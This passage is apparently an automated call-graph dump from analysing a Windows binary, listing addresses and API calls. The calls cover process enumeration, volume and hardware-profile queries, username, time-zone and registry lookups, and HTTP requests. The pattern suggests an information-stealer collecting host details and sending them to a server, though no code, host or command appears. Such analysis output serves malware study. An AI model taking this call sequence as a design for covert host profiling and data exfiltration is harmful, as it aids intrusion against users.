79783->79784 79785 4047e8 3 API calls 79784->79785 79786 4045f9 79785->79786 79787 4047e8 3 API calls 79786->79787 79788 404612 79787->79788 79789 4047e8 3 API calls 79788->79789 79790 404629 79789->79790 79791 4047e8 3 API calls 79790->79791 79792 404642 79791->79792 79793 4047e8 3 API calls 79792->79793 79794 404656 79793->79794 79795 4047e8 3 API calls 79794->79795 79796 40466d 79795->79796 79797 4047e8 3 API calls 79796->79797 79798 404684 79797->79798 79799 4047e8 3 API calls 79798->79799 79800 40469b 79799->79800 79801 4047e8 3 API calls 79800->79801 79802 4046b2 79801->79802 79803 4047e8 3 API calls 79802->79803 79804 4046cc 79803->79804 79805 4047e8 3 API calls 79804->79805 79806 4046e3 79805->79806 79807 4047e8 3 API calls 79806->79807 79808 4046f9 79807->79808 79809 4047e8 3 API calls 79808->79809 79810 404710 79809->79810 79811 4047e8 3 API calls 79810->79811 79812 404727 79811->79812 79813 4047e8 3 API calls 79812->79813 79814 40473d 79813->79814 79815 4047e8 3 API calls 79814->79815 79816 404754 79815->79816 79817 4047e8 3 API calls 79816->79817 79818 404768 79817->79818 79819 4047e8 3 API calls 79818->79819 79820 404781 79819->79820 79821 4047e8 3 API calls 79820->79821 79822 404797 79821->79822 79823 4047e8 3 API calls 79822->79823 79824 4047ae 79823->79824 79825 4047e8 3 API calls 79824->79825 79826 4047c5 79825->79826 79827 4047e8 3 API calls 79826->79827 79828 4047dc 79827->79828 79828->78836 81148 42f109 79829->81148 79831 41258e CreateToolhelp32Snapshot Process32First 79832 4125c2 Process32Next 79831->79832 79833 4125ef CloseHandle 79831->79833 79832->79833 79834 4125d4 StrCmpCA 79832->79834 81149 42f165 79833->81149 79834->79832 79836 4125e6 79834->79836 79836->79832 79839 4104e7 lstrcpyA 79838->79839 79840 411c67 79839->79840 79841 4104e7 lstrcpyA 79840->79841 79842 411c75 GetSystemTime 79841->79842 79843 411c91 79842->79843 79844 41d016 __setmbcp_nolock 5 API calls 79843->79844 79845 411cc8 79844->79845 79845->78843 79848 4105e1 79846->79848 79847 410605 79847->78858 79848->79847 79849 4105f3 lstrcpyA lstrcatA 79848->79849 79849->79847 79851 410519 lstrcpyA 79850->79851 79852 401d07 79851->79852 79853 410519 lstrcpyA 79852->79853 79854 401d12 79853->79854 79855 410519 lstrcpyA 79854->79855 79856 401d1d 79855->79856 79857 410519 lstrcpyA 79856->79857 79858 401d34 79857->79858 79859 4169b6 79858->79859 79860 410549 2 API calls 79859->79860 79861 4169ec 79860->79861 79862 410549 2 API calls 79861->79862 79863 4169f9 79862->79863 79864 410549 2 API calls 79863->79864 79865 416a06 79864->79865 79866 4104e7 lstrcpyA 79865->79866 79867 416a13 79866->79867 79868 4104e7 lstrcpyA 79867->79868 79869 416a20 79868->79869 79870 4104e7 lstrcpyA 79869->79870 79871 416a2d 79870->79871 79872 4104e7 lstrcpyA 79871->79872 79873 416a3a 79872->79873 79874 4104e7 lstrcpyA 79873->79874 79875 416a47 79874->79875 79876 4104e7 lstrcpyA 79875->79876 79895 416a54 79876->79895 79879 416a98 StrCmpCA 79880 416af1 StrCmpCA 79879->79880 79879->79895 79881 416cd4 79880->79881 79880->79895 79884 41058d lstrcpyA 79881->79884 79885 416cdf 79884->79885 79887 4104e7 lstrcpyA 79885->79887 79888 416cec 79887->79888 79890 41058d lstrcpyA 79888->79890 79889 401cfd lstrcpyA 79889->79895 79894 416c2c 79890->79894 79891 41683e 28 API calls 79891->79895 79892 4168c6 33 API calls 79892->79895 79893 41058d lstrcpyA 79893->79895 79896 4104e7 lstrcpyA 79894->79896 79895->79879 79895->79880 79895->79889 79895->79891 79895->79892 79895->79893 79898 416b51 StrCmpCA 79895->79898 79900 416baa StrCmpCA 79895->79900 79911 410519 lstrcpyA 79895->79911 81152 4029f8 79895->81152 81155 402a09 79895->81155 81158 402a1a 79895->81158 81168 402a2b lstrcpyA 79895->81168 81169 402a3c lstrcpyA 79895->81169 81170 402a4d lstrcpyA 79895->81170 79897 416d0b 79896->79897 79899 41058d lstrcpyA 79897->79899 79898->79895 79898->79900 79907 416d15 79899->79907 79901 416bc0 StrCmpCA 79900->79901 79902 416ca3 79900->79902 79905 416c72 79901->79905 79906 416bd6 StrCmpCA 79901->79906 79904 41058d lstrcpyA 79902->79904 79908 416cae 79904->79908 79912 41058d lstrcpyA 79905->79912 79909 416be8 StrCmpCA 79906->79909 79910 416c3e 79906->79910 81161 416da2 79907->81161 79914 4104e7 lstrcpyA 79908->79914 79915 416c0a 79909->79915 79916 416bfa Sleep 79909->79916 79918 41058d lstrcpyA 79910->79918 79911->79895 79917 416c7d 79912->79917 79919 416cbb 79914->79919 79920 41058d lstrcpyA 79915->79920 79916->79895 79921 4104e7 lstrcpyA 79917->79921 79922 416c49 79918->79922 79924 41058d lstrcpyA 79919->79924 79925 416c15 79920->79925 79926 416c8a 79921->79926 79923 4104e7 lstrcpyA 79922->79923 79927 416c56 79923->79927 79924->79894 79928 4104e7 lstrcpyA 79925->79928 79929 41058d lstrcpyA 79926->79929 79930 41058d lstrcpyA 79927->79930 79931 416c22 79928->79931 79929->79894 79930->79894 79932 41058d lstrcpyA 79931->79932 79932->79894 79933 416d28 79933->78869 79935 41058d lstrcpyA 79934->79935 79936 418257 79935->79936 79937 41058d lstrcpyA 79936->79937 79938 418262 79937->79938 79939 41058d lstrcpyA 79938->79939 79940 41826d 79939->79940 79940->78873 79942 410529 79941->79942 79943 41053e 79942->79943 79944 410536 lstrcpyA 79942->79944 79943->78886 79944->79943 79946 4109e6 GetVolumeInformationA 79945->79946 79947 4109df 79945->79947 79948 410a4d 79946->79948 79947->79946 79948->79948 79949 410a62 GetProcessHeap HeapAlloc 79948->79949 79950 410a7d 79949->79950 79951 410a8c wsprintfA lstrcatA 79949->79951 79952 4104e7 lstrcpyA 79950->79952 81171 411684 GetCurrentHwProfileA 79951->81171 79954 410a85 79952->79954 79957 41d016 __setmbcp_nolock 5 API calls 79954->79957 79955 410ac7 lstrlenA 81187 4123d5 lstrcpyA malloc strncpy 79955->81187 79959 410b2e 79957->79959 79958 410aea lstrcatA 79960 410b01 79958->79960 79959->78913 79961 4104e7 lstrcpyA 79960->79961 79962 410b18 79961->79962 79962->79954 79964 410519 lstrcpyA 79963->79964 79965 404b59 79964->79965 81191 404ab6 79965->81191 79967 404b65 79968 4104e7 lstrcpyA 79967->79968 79969 404b81 79968->79969 79970 4104e7 lstrcpyA 79969->79970 79971 404b91 79970->79971 79972 4104e7 lstrcpyA 79971->79972 79973 404ba1 79972->79973 79974 4104e7 lstrcpyA 79973->79974 79975 404bb1 79974->79975 79976 4104e7 lstrcpyA 79975->79976 79977 404bc1 InternetOpenA StrCmpCA 79976->79977 79978 404bf5 79977->79978 79979 405194 InternetCloseHandle 79978->79979 79980 411c4a 7 API calls 79978->79980 79990 4051e1 79979->79990 79981 404c15 79980->79981 79982 4105c7 2 API calls 79981->79982 79983 404c28 79982->79983 79984 41058d lstrcpyA 79983->79984 79985 404c33 79984->79985 79986 410609 3 API calls 79985->79986 79987 404c5f 79986->79987 79988 41058d lstrcpyA 79987->79988 79989 404c6a 79988->79989 79991 410609 3 API calls 79989->79991 79992 41d016 __setmbcp_nolock 5 API calls 79990->79992 79993 404c8b 79991->79993 79994 405235 79992->79994 79995 41058d lstrcpyA 79993->79995 80096 4139c2 StrCmpCA 79994->80096 79996 404c96 79995->79996 79997 4105c7 2 API calls 79996->79997 79998 404cb8 79997->79998 79999 41058d lstrcpyA 79998->79999 80000 404cc3 79999->80000 80001 410609 3 API calls 80000->80001 80002 404ce4 80001->80002 80003 41058d lstrcpyA 80002->80003 80004 404cef 80003->80004 80005 410609 3 API calls 80004->80005 80006 404d10 80005->80006 80007 41058d lstrcpyA 80006->80007 80008 404d1b 80007->80008 80009 410609 3 API calls 80008->80009 80010 404d3d 80009->80010 80011 4105c7 2 API calls 80010->80011 80012 404d48 80011->80012 80013 41058d lstrcpyA 80012->80013 80014 404d53 80013->80014 80015 404d69 InternetConnectA 80014->80015 80015->79979 80016 404d97 HttpOpenRequestA 80015->80016 80017 404dd7 80016->80017 80018 405188 InternetCloseHandle 80016->80018 80019 404dfb 80017->80019 80020 404ddf InternetSetOptionA 80017->80020 80018->79979 80021 410609 3 API calls 80019->80021 80020->80019 80022 404e11 80021->80022 80023 41058d lstrcpyA 80022->80023 80024 404e1c 80023->80024 80025 4105c7 2 API calls 80024->80025 80026 404e3e 80025->80026 80027 41058d lstrcpyA 80026->80027 80028 404e49 80027->80028 80029 410609 3 API calls 80028->80029 80030 404e6a 80029->80030 80031 41058d lstrcpyA 80030->80031 80032 404e75 80031->80032 80033 410609 3 API calls 80032->80033 80034 404e97 80033->80034 80035 41058d lstrcpyA 80034->80035 80036 404ea2 80035->80036 80037 410609 3 API calls 80036->80037 80038 404ec3 80037->80038 80039 41058d lstrcpyA 80038->80039 80040 404ece 80039->80040 80041 410609 3 API calls 80040->80041 80042 404eef 80041->80042 80043 41058d lstrcpyA 80042->80043 80044 404efa 80043->80044 80045 4105c7 2 API calls 80044->80045 80046 404f19 80045->80046 80047 41058d lstrcpyA 80046->80047 80048 404f24 80047->80048 80049 410609 3 API calls 80048->80049 80050 404f45 80049->80050 80051 41058d lstrcpyA 80050->80051 80052 404f50 80051->80052 80053 410609 3 API calls 80052->80053 80054 404f71 80053->80054 80055 41058d lstrcpyA 80054->80055 80056 404f7c 80055->80056 80057 4105c7 2 API calls 80056->80057 80058 404f9e 80057->80058 80059 41058d lstrcpyA 80058->80059 80060 404fa9 80059->80060 80061 410609 3 API calls 80060->80061 80062 404fca 80061->80062 80063 41058d lstrcpyA 80062->80063 80064 404fd5 80063->80064 80065 410609 3 API calls 80064->80065 80066 404ff7 80065->80066 80067 41058d lstrcpyA 80066->80067 80068 405002 80067->80068 80069 410609 3 API calls 80068->80069 80070 405023 80069->80070 80071 41058d lstrcpyA 80070->80071 80072 40502e 80071->80072 80073 410609 3 API calls 80072->80073 80074 40504f 80073->80074 80075 41058d lstrcpyA 80074->80075 80076 40505a 80075->80076 80077 4105c7 2 API calls 80076->80077 80078 405079 80077->80078 80079 41058d lstrcpyA 80078->80079 80080 405084 80079->80080 80081 4104e7 lstrcpyA 80080->80081 80082 40509f 80081->80082 80083 4105c7 2 API calls 80082->80083 80084 4050b6 80083->80084 80085 4105c7 2 API calls 80084->80085 80086 4050c7 80085->80086 80087 41058d lstrcpyA 80086->80087 80088 4050d2 80087->80088 80089 4050e8 lstrlenA lstrlenA HttpSendRequestA 80088->80089 80090 40515c InternetReadFile 80089->80090 80091 405176 InternetCloseHandle 80090->80091 80094 40511c 80090->80094 80092 402920 80091->80092 80092->80018 80093 410609 3 API calls 80093->80094 80094->80090 80094->80091 80094->80093 80095 41058d lstrcpyA 80094->80095 80095->80094 80097 4139e1 ExitProcess 80096->80097 80098 4139e8 strtok_s 80096->80098 80099 413b48 80098->80099 80112 413a04 80098->80112 80099->78921 80100 413b2a strtok_s 80100->80099 80100->80112 80101 413a21 StrCmpCA 80101->80100 80101->80112 80102 413a75 StrCmpCA 80102->80100 80102->80112 80103 413ab4 StrCmpCA 80103->80100 80103->80112 80104 413af4 StrCmpCA 80104->80100 80105 413b16 StrCmpCA 80105->80100 80106 413a59 StrCmpCA 80106->80100 80106->80112 80107 413ac9 StrCmpCA 80107->80100 80107->80112 80108 413a3d StrCmpCA 80108->80100 80108->80112 80109 413a9f StrCmpCA 80109->80100 80109->80112 80110 413ade StrCmpCA 80110->80100 80111 410549 2 API calls 80111->80112 80112->80100 80112->80101 80112->80102 80112->80103 80112->80104 80112->80105 80112->80106 80112->80107 80112->80108 80112->80109 80112->80110 80112->80111 80114 410519 lstrcpyA 80113->80114 80115 405f64 80114->80115 80116 404ab6 5 API calls 80115->80116 80117 405f70 80116->80117 80118 4104e7 lstrcpyA 80117->80118 80119 405f8c 80118->80119 80120 4104e7 lstrcpyA 80119->80120 80121 405f9c 80120->80121 80122 4104e7 lstrcpyA 80121->80122 80123 405fac 80122->80123 80124 4104e7 lstrcpyA 80123->80124 80125 405fbc 80124->80125 80126 4104e7 lstrcpyA 80125->80126 80127 405fcc InternetOpenA StrCmpCA 80126->80127 80128 406000 80127->80128 80129 4066ff InternetCloseHandle 80128->80129 80130 411c4a 7 API calls 80128->80130 81197 408048 CryptStringToBinaryA 80129->81197 80133 406020 80130->80133 80134 4105c7 2 API calls 80133->80134 80136 406033 80134->80136 80135 410549 2 API calls 80138 406739 80135->80138 80137 41058d lstrcpyA 80136->80137 80140 40603e 80137->80140 80139 410609 3 API calls 80138->80139 80141 406750 80139->80141 80143 410609 3 API calls 80140->80143 80142 41058d lstrcpyA 80141->80142 80147 40675b 80142->80147 80144 40606a 80143->80144 80145 41058d lstrcpyA 80144->80145 80146 406075 80145->80146 80149 410609 3 API calls 80146->80149 80148 41d016 __setmbcp_nolock 5 API calls 80147->80148 80150 4067eb 80148->80150 80151 406096 80149->80151 80280 41343f strtok_s 80150->80280 80152 41058d lstrcpyA 80151->80152 80153 4060a1 80152->80153 80154 4105c7 2 API calls 80153->80154 80155 4060c3 80154->80155 80156 41058d lstrcpyA 80155->80156 80157 4060ce 80156->80157 80158 410609 3 API calls 80157->80158 80159 4060ef 80158->80159 80160 41058d lstrcpyA 80159->80160 80161 4060fa 80160->80161 80162 410609 3 API calls 80161->80162 80163 40611b 80162->80163 80164 41058d lstrcpyA 80163->80164 80165 406126 80164->80165 80166 410609 3 API calls 80165->80166 80167 406148 80166->80167 80168 4105c7 2 API calls 80167->80168 80169 406153 80168->80169 80170 41058d lstrcpyA 80169->80170 80171 40615e 80170->80171 80172 406174 InternetConnectA 80171->80172 80172->80129 80173 4061a2 HttpOpenRequestA 80172->80173 80174 4061e2 80173->80174 80175 4066f3 InternetCloseHandle 80173->80175 80176 406206 80174->80176 80177 4061ea InternetSetOptionA 80174->80177 80175->80129 80178 410609 3 API calls 80176->80178 80177->80176 80179 40621c 80178->80179 80180 41058d lstrcpyA 80179->80180 80181 406227 80180->80181 80182 4105c7 2 API calls 80181->80182 80183 406249 80182->80183 80184 41058d lstrcpyA 80183->80184 80185 406254 80184->80185 80186 410609 3 API calls 80185->80186 80187 406275 80186->80187 80188 41058d lstrcpyA 80187->80188 80189 406280 80188->80189 80190 410609 3 API calls 80189->80190 80191 4062a2 80190->80191 80192 41058d lstrcpyA 80191->80192 80193 4062ad 80192->80193 80194 410609 3 API calls 80193->80194 80195 4062cf 80194->80195 80196 41058d lstrcpyA 80195->80196 80197 4062da 80196->80197 80198 410609 3 API calls 80197->80198 80199 4062fb 80198->80199 80200 41058d lstrcpyA 80199->80200 80201 406306 80200->80201 80202 4105c7 2 API calls 80201->80202 80203 406325 80202->80203 80204 41058d lstrcpyA 80203->80204 80205 406330 80204->80205 80206 410609 3 API calls 80205->80206 80207 406351 80206->80207 80208 41058d lstrcpyA 80207->80208 80209 40635c 80208->80209 80210 410609 3 API calls 80209->80210 80211 40637d 80210->80211 80212 41058d lstrcpyA 80211->80212 80213 406388 80212->80213 80214 4105c7 2 API calls 80213->80214 80215 4063aa 80214->80215 80216 41058d lstrcpyA 80215->80216 80217 4063b5 80216->80217 80218 410609 3 API calls 80217->80218 80219 4063d6 80218->80219 80220 41058d lstrcpyA 80219->80220 80221 4063e1 80220->80221 80222 410609 3 API calls 80221->80222 80223 406403 80222->80223 80224 41058d lstrcpyA 80223->80224 80225 40640e 80224->80225 80226 410609 3 API calls 80225->80226 80227 40642f 80226->80227 80228 41058d lstrcpyA 80227->80228 80229 40643a 80228->80229 80230 410609 3 API calls 80229->80230 80231 40645b 80230->80231 80232 41058d lstrcpyA 80231->80232 80233 406466 80232->80233 80234 410609 3 API calls 80233->80234 80235 406487 80234->80235 80236 41058d lstrcpyA 80235->80236 80237 406492 80236->80237 80238 410609 3 API calls 80237->80238 80239 4064b3 80238->80239 80240 41058d lstrcpyA 80239->80240 80241 4064be 80240->80241 80242 410609 3 API calls 80241->80242 80243 4064df 80242->80243 80244 41058d lstrcpyA 80243->80244 80245 4064ea 80244->80245 80246 4105c7 2 API calls 80245->80246 80247 406506 80246->80247 80248 41058d lstrcpyA 80247->80248 80249 406511 80248->80249 80250 410609 3 API calls 80249->80250 80251 406532 80250->80251 80252 41058d lstrcpyA 80251->80252 80253 40653d 80252->80253 80254 410609 3 API calls 80253->80254 80255 40655f 80254->80255 80256 41058d lstrcpyA 80255->80256 80257 40656a 80256->80257 80258 410609 3 API calls 80257->80258 80259 40658b 80258->80259 80260 41058d lstrcpyA 80259->80260 80261 406596 80260->80261 80262 410609 3 API calls 80261->80262 80263 4065b7 80262->80263 80264 41058d lstrcpyA 80263->80264 80265 4065c2 80264->80265 80266 4105c7 2 API calls 80265->80266 80267 4065e1 80266->80267 80268 41058d lstrcpyA 80267->80268 80269 4065ec 80268->80269 80270 4065f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 80269->80270 81195 427050 80270->81195 80272 40663e lstrlenA lstrlenA 80273 427050 _memmove 80272->80273 80274 406667 lstrlenA HttpSendRequestA 80273->80274 80275 4066d2 InternetReadFile 80274->80275 80276 4066ec InternetCloseHandle 80275->80276 80278 406692 80275->80278 80276->80175 80277 410609 3 API calls 80277->80278 80278->80275 80278->80276 80278->80277 80279 41058d lstrcpyA 80278->80279 80279->80278 80281 4134cc 80280->80281 80284 41346e 80280->80284 80281->78936 80282 410549 2 API calls 80283 4134b6 strtok_s 80282->80283 80283->80281 80283->80284 80284->80282 80284->80283 80285 410549 2 API calls 80284->80285 80285->80284 80294 413286 80286->80294 80287 413385 80287->78949 80288 413332 StrCmpCA 80288->80294 80289 410549 2 API calls 80289->80294 80290 413367 strtok_s 80290->80294 80291 413301 StrCmpCA 80291->80294 80292 4132dc StrCmpCA 80292->80294 80293 4132ab StrCmpCA 80293->80294 80294->80287 80294->80288 80294->80289 80294->80290 80294->80291 80294->80292 80294->80293 80296 4133bc 80295->80296 80297 413434 80295->80297 80298 410549 2 API calls 80296->80298 80299 4133e2 StrCmpCA 80296->80299 80300 41341a strtok_s 80296->80300 80301 410549 2 API calls 80296->80301 80297->78962 80298->80300 80299->80296 80300->80296 80300->80297 80301->80296 80303 4104e7 lstrcpyA 80302->80303 80304 413b9f 80303->80304 80305 410609 3 API calls 80304->80305 80306 413baf 80305->80306 80307 41058d lstrcpyA 80306->80307 80308 413bb7 80307->80308 80309 410609 3 API calls 80308->80309 80310 413bcf 80309->80310 80311 41058d lstrcpyA 80310->80311 80312 413bd7 80311->80312 80313 410609 3 API calls 80312->80313 80314 413bef 80313->80314 80315 41058d lstrcpyA 80314->80315 80316 413bf7 80315->80316 80317 410609 3 API calls 80316->80317 80318 413c0f 80317->80318 80319 41058d lstrcpyA 80318->80319 80320 413c17 80319->80320 80321 410609 3 API calls 80320->80321 80322 413c2f 80321->80322 80323 41058d lstrcpyA 80322->80323 80324 413c37 80323->80324 81202 410cc0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 80324->81202 80327 410609 3 API calls 80328 413c50 80327->80328 80329 41058d lstrcpyA 80328->80329 80330 413c58 80329->80330 80331 410609 3 API calls 80330->80331 80332 413c70 80331->80332 80333 41058d lstrcpyA 80332->80333 80334 413c78 80333->80334 80335 410609 3 API calls 80334->80335 80336 413c90 80335->80336 80337 41058d lstrcpyA 80336->80337 80338 413c98 80337->80338 81205 4115d4 80338->81205 80341 410609 3 API calls 80342 413cb1 80341->80342 80343 41058d lstrcpyA 80342->80343 80344 413cb9 80343->80344 80345 410609 3 API calls 80344->80345 80346 413cd1 80345->80346 80347 41058d lstrcpyA 80346->80347 80348 413cd9 80347->80348 80349 410609 3 API calls 80348->80349 80350 413cf1 80349->80350 80351 41058d lstrcpyA 80350->80351 80352 413cf9 80351->80352 80353 411684 11 API calls 80352->80353 80354 413d09 80353->80354 80355 4105c7 2 API calls 80354->80355 80356 413d16 80355->80356 80357 41058d lstrcpyA 80356->80357 80358 413d1e 80357->80358 80359 410609 3 API calls 80358->80359 80360 413d3e 80359->80360 80361 41058d lstrcpyA 80360->80361 80362 413d46 80361->80362 80363 410609 3 API calls 80362->80363 80364 413d5e 80363->80364 80365 41058d lstrcpyA 80364->80365 80366 413d66 80365->80366 80367 4109a2 19 API calls 80366->80367 80368 413d76 80367->80368 80369 4105c7 2 API calls 80368->80369 80370 413d83 80369->80370 80371 41058d lstrcpyA 80370->80371 80372 413d8b 80371->80372 80373 410609 3 API calls 80372->80373 80374 413dab 80373->80374 80375 41058d lstrcpyA 80374->80375 80376 413db3 80375->80376 80377 410609 3 API calls 80376->80377 80378 413dcb 80377->80378 80379 41058d lstrcpyA 80378->80379 80380 413dd3 80379->80380 80381 413ddb GetCurrentProcessId 80380->80381 81213 41224a OpenProcess 80381->81213 80384 4105c7 2 API calls 80385 413df8 80384->80385 80386 41058d lstrcpyA 80385->80386 80387 413e00 80386->80387 80388 410609 3 API calls 80387->80388 80389 413e20 80388->80389 80390 41058d lstrcpyA 80389->80390 80391 413e28 80390->80391 80392 410609 3 API calls 80391->80392 80393 413e40 80392->80393 80394 41058d lstrcpyA 80393->80394 80395 413e48 80394->80395 80396 410609 3 API calls 80395->80396 80397 413e60 80396->80397 80398 41058d lstrcpyA 80397->80398 80399 413e68 80398->80399 80400 410609 3 API calls 80399->80400 80401 413e80 80400->80401 80402 41058d lstrcpyA 80401->80402 80403 413e88 80402->80403 81220 410b30 GetProcessHeap HeapAlloc 80403->81220 80406 410609 3 API calls 80407 413ea1 80406->80407 80408 41058d lstrcpyA 80407->80408 80409 413ea9 80408->80409 80410 410609 3 API calls 80409->80410 80411 413ec1 80410->80411 80412 41058d lstrcpyA 80411->80412 80413 413ec9 80412->80413 80414 410609 3 API calls 80413->80414 80415 413ee1 80414->80415 80416 41058d lstrcpyA 80415->80416 80417 413ee9 80416->80417 81226 411807 80417->81226 80420 4105c7 2 API calls 80421 413f06 80420->80421 80422 41058d lstrcpyA 80421->80422 80423 413f0e 80422->80423 80424 410609 3 API calls 80423->80424 80425 413f2e 80424->80425 80426 41058d lstrcpyA 80425->80426 80427 413f36 80426->80427 80428 410609 3 API calls 80427->80428 80429 413f4e 80428->80429 80430 41058d lstrcpyA 80429->80430 80431 413f56 80430->80431 81243 411997 80431->81243 80433 413f67 80434 4105c7 2 API calls 80433->80434 80435 413f75 80434->80435 80436 41058d lstrcpyA 80435->80436 80437 413f7d 80436->80437 80438 410609 3 API calls 80437->80438 80439 413f9d 80438->80439 80440 41058d lstrcpyA 80439->80440 80441 413fa5 80440->80441 80442 410609 3 API calls 80441->80442 80443 413fbd 80442->80443 80444 41058d lstrcpyA 80443->80444 80445 413fc5 80444->80445 80446 410c85 3 API calls 80445->80446 80447 413fd2 80446->80447 80448 410609 3 API calls 80447->80448 80449 413fde 80448->80449 80450 41058d lstrcpyA 80449->80450 80451 413fe6 80450->80451 80452 410609 3 API calls 80451->80452 80453 413ffe 80452->80453 80454 41058d lstrcpyA 80453->80454 80455 414006 80454->80455 80456 410609 3 API calls 80455->80456 80457 41401e 80456->80457 80458 41058d lstrcpyA 80457->80458 80459 414026 80458->80459 81258 410c53 GetProcessHeap HeapAlloc GetUserNameA 80459->81258 80461 414033 80462 410609 3 API calls 80461->80462 80463 41403f 80462->80463 80464 41058d lstrcpyA 80463->80464 80465 414047 80464->80465 80466 410609 3 API calls 80465->80466 80467 41405f 80466->80467 80468 41058d lstrcpyA 80467->80468 80469 414067 80468->80469 80470 410609 3 API calls 80469->80470 80471 41407f 80470->80471 80472 41058d lstrcpyA 80471->80472 80473 414087 80472->80473 81259 411563 7 API calls 80473->81259 80476 4105c7 2 API calls 80477 4140a6 80476->80477 80478 41058d lstrcpyA 80477->80478 80479 4140ae 80478->80479 80480 410609 3 API calls 80479->80480 80481 4140ce 80480->80481 80482 41058d lstrcpyA 80481->80482 80483 4140d6 80482->80483 80484 410609 3 API calls 80483->80484 80485 4140ee 80484->80485 80486 41058d lstrcpyA 80485->80486 80487 4140f6 80486->80487 81262 410ddb 80487->81262 80490 4105c7 2 API calls 80491 414113 80490->80491 80492 41058d lstrcpyA 80491->80492 80493 41411b 80492->80493 80494 410609 3 API calls 80493->80494 80495 41413b 80494->80495 80496 41058d lstrcpyA 80495->80496 80497 414143 80496->80497 80498 410609 3 API calls 80497->80498 80499 41415b 80498->80499 80500 41058d lstrcpyA 80499->80500 80501 414163 80500->80501 80502 410cc0 9 API calls 80501->80502 80503 414170 80502->80503 80504 410609 3 API calls 80503->80504 80505 41417c 80504->80505 80506 41058d lstrcpyA 80505->80506 80507 414184 80506->80507 80508 410609 3 API calls 80507->80508 80509 41419c 80508->80509 80510 41058d lstrcpyA 80509->80510 80511 4141a4 80510->80511 80512 410609 3 API calls 80511->80512 80513 4141bc 80512->80513 80514 41058d lstrcpyA 80513->80514 80515 4141c4 80514->80515 81274 410d2e GetProcessHeap HeapAlloc GetTimeZoneInformation 80515->81274 80518 410609 3 API calls 80519 4141dd 80518->80519 80520 41058d lstrcpyA 80519->80520 80521 4141e5 80520->80521 80522 410609 3 API calls 80521->80522 80523 4141fd 80522->80523 80524 41058d lstrcpyA 80523->80524 80525 414205 80524->80525 80526 410609 3 API calls 80525->80526 80527 41421d 80526->80527 80528 41058d lstrcpyA 80527->80528 80529 414225 80528->80529 80530 410609 3 API calls 80529->80530 80531 41423d 80530->80531 80532 41058d lstrcpyA 80531->80532 80533 414245 80532->80533 81279 410f51 GetProcessHeap HeapAlloc RegOpenKeyExA 80533->81279 80536 410609 3 API calls 80537 41425e 80536->80537 80538 41058d lstrcpyA 80537->80538 80539 414266 80538->80539 80540 410609 3 API calls 80539->80540 80541 41427e 80540->80541 80542 41058d lstrcpyA 80541->80542 80543 414286 80542->80543 80544 410609 3 API calls 80543->80544 80545 41429e 80544->80545 80546 41058d lstrcpyA 80545->80546 80547 4142a6 80546->80547 81282 411007 80547->81282 80550 410609 3 API calls 80551 4142bf 80550->80551 80552 41058d lstrcpyA 80551->80552 80553 4142c7 80552->80553 80554 410609 3 API calls 80553->80554 80555 4142df 80554->80555 80556 41058d lstrcpyA 80555->80556 80557 4142e7 80556->80557 80558 410609 3 API calls 80557->80558 80559 4142ff 80558->80559 80560 41058d lstrcpyA 80559->80560 80561 414307 80560->80561 81299 410fba GetSystemInfo wsprintfA 80561->81299 80564 410609 3 API calls 80565 414320 80564->80565 80566 41058d lstrcpyA 80565->80566 80567 414328 80566->80567 80568 410609 3 API calls 80567->80568 80569 414340 80568->80569 80570 41058d lstrcpyA 80569->80570 80571 414348 80570->80571 80572 410609 3 API calls 80571->80572 80573 414360 80572->80573 80574 41058d lstrcpyA 80573->80574 80575 414368 80574->80575 81302 411119 GetProcessHeap HeapAlloc 80575->81302 80578 410609 3 API calls 80579 414381 80578->80579 80580 41058d lstrcpyA 80579->80580 80581 414389 80580->80581 80582 410609 3 API calls 80581->80582 80583 4143a4 80582->80583 80584 41058d lstrcpyA 80583->80584 80585 4143ac 80584->80585 80586 410609 3 API calls 80585->80586 80587 4143c7 80586->80587 80588 41058d lstrcpyA 80587->80588 80589 4143cf 80588->80589 81309 411192 80589->81309 80592 4105c7 2 API calls 80593 4143ef 80592->80593 80594 41058d lstrcpyA 80593->80594 80595 4143f7 80594->80595 80596 410609 3 API calls 80595->80596 80597 41441a 80596->80597 80598 41058d lstrcpyA 80597->80598 80599 414422 80598->80599 80600 410609 3 API calls 80599->80600 80601 41443a 80600->80601 80602 41058d lstrcpyA 80601->80602 80603 414442 80602->80603 81317 4114a5 80603->81317 80606 4105c7 2 API calls 80607 414462 80606->80607 80608 41058d lstrcpyA 80607->80608 80609 41446a 80608->80609 80610 410609 3 API calls 80609->80610 80611 414490 80610->80611 80612 41058d lstrcpyA 80611->80612 80613 414498 80612->80613 80614 410609 3 API calls 80613->80614 80615 4144b3 80614->80615 80616 41058d lstrcpyA 80615->80616 80617 4144bb 80616->80617 81327 411203 80617->81327 80620 4105c7 2 API calls 80621 4144e0 80620->80621 80622 41058d lstrcpyA 80621->80622 80623 4144e8 80622->80623 80624 411203 18 API calls 80623->80624 80625 414509 80624->80625 80626 4105c7 2 API calls 80625->80626 80627 414518 80626->80627 80628 41058d lstrcpyA 80627->80628 80629 414520 80628->80629 80630 410609 3 API calls 80629->80630 80631 414543 80630->80631 80632 41058d lstrcpyA 80631->80632 80633 41454b 80632->80633 80634 401cfd lstrcpyA 80633->80634 80635 414560 lstrlenA 80634->80635 80636 4104e7 lstrcpyA 80635->80636 80637 41457d 80636->80637 81343 416e97 80637->81343 81148->79831 81150 41d016 __setmbcp_nolock 5 API calls 81149->81150 81151 412601 81150->81151 81151->79048 81151->79053 81153 4104e7 lstrcpyA 81152->81153 81154 402a05 81153->81154 81154->79895 81156 4104e7 lstrcpyA 81155->81156 81157 402a16 81156->81157 81157->79895 81159 4104e7 lstrcpyA 81158->81159 81160 402a27 81159->81160 81160->79895 81162 410519 lstrcpyA 81161->81162 81163 416dac 81162->81163 81164 410519 lstrcpyA 81163->81164 81165 416db7 81164->81165 81166 410519 lstrcpyA 81165->81166 81167 416dc2 81166->81167 81167->79933 81168->79895 81169->79895 81170->79895 81172 4116ad 81171->81172 81173 41173c 81171->81173 81175 4104e7 lstrcpyA 81172->81175 81174 4104e7 lstrcpyA 81173->81174 81176 411748 81174->81176 81177 4116c0 _memset 81175->81177 81178 41d016 __setmbcp_nolock 5 API calls 81176->81178 81188 4123d5 lstrcpyA malloc strncpy 81177->81188 81179 411755 81178->81179 81179->79955 81181 4116ea lstrcatA 81189 402920 81181->81189 81183 411707 lstrcatA 81184 411724 81183->81184 81185 4104e7 lstrcpyA 81184->81185 81186 411732 81185->81186 81186->81176 81187->79958 81188->81181 81190 402924 81189->81190 81190->81183 81192 404ac4 81191->81192 81192->81192 81193 